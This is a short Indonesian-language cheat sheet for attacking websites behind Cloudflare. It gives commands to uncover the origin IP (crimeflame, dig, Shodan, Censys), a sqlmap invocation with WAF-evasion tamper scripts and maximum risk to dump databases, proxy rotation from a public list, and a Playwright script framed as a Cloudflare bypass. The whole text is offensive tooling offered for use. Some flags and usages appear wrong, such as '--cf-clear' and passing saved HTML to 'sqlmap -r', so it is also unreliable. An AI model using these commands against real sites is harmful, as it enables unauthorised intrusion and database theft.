1. REAL IP Discovery (Paling Penting!)
# Cari IP asli CF (cloudflare bypass)
curl -s "https://www.cloudflare.com/ips-v4" # CF IPs
crimeflame target.com # Tool khusus CF
dig +short target.com @1.1.1.1 # DNS leak
# Censys/Shodan
shodan host target.com
curl "https://api.censys.io/v1/search/ipv4?fields=IPs&q=hostname:target.com"
2. CLOUDFLARE TURN OFF MODE
# Sqlmap + FULL CF bypass
sqlmap -u "http://target.com/page.php?id=1" \
--cf-clear \
--gpage \
--tamper=apostrophemask,charencode,equaltolike,randomcase,securesphere,space2comment,unionalltounion \
--user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15" \
--delay=10 \
--timeout=120 \
--retries=10 \
--threads=1 \
--flush-session \
--fresh-queries \
--level=5 \
--risk=3 \
--dbs
3. RESIDENTIAL PROXY (Ini yang paling ampuh)
# Free proxy list
curl -s "https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt" | head -10
# Sqlmap + rotating proxy
sqlmap -u URL \
--proxy-file=proxies.txt \
--proxy-freq=3 \
--random-agent
4. BROWSER AUTOMATION (CF ga bisa block)
# Install playwright
pip install playwright && playwright install chromium
# Script bypass
cat > cf_bypass.py << EOF
from playwright.sync_api import sync_playwright
with sync_playwright() as p:
browser = p.chromium.launch(headless=False)
page = browser.new_page()
page.goto('http://target.com/page.php?id=1')
page_content = page.content()
with open('page.html', 'w') as f:
f.write(page_content)
browser.close()
EOF
python cf_bypass.py
sqlmap -r page.html --dbs